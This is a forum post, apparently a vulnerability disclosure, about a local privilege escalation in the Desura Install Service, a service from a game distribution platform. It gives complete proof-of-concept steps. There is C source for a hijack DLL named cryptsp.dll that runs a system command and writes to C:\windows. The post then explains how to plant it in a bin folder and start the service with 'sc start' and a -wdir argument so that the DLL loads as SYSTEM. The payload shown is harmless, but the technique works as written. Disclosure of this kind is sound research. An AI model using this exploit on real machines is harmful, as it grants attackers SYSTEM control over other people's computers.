"Desura is a digital distribution platform developed by Linden Research":
http://www.desura.com
Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life.
Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show.
Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges:
Code: Select all
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
if(ulReason == DLL_PROCESS_ATTACH) {
system("echo HELLO > c:\\windows\\poc.txt");
Sleep(-1);
}
return TRUE;
}Create an empty folder called bin and put the dll there.
Kill/close the Desura client if it's running.
Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:
Code: Select all
sc start "Desura Install Service" -wdir z:\pocThat's all.
Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp
If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf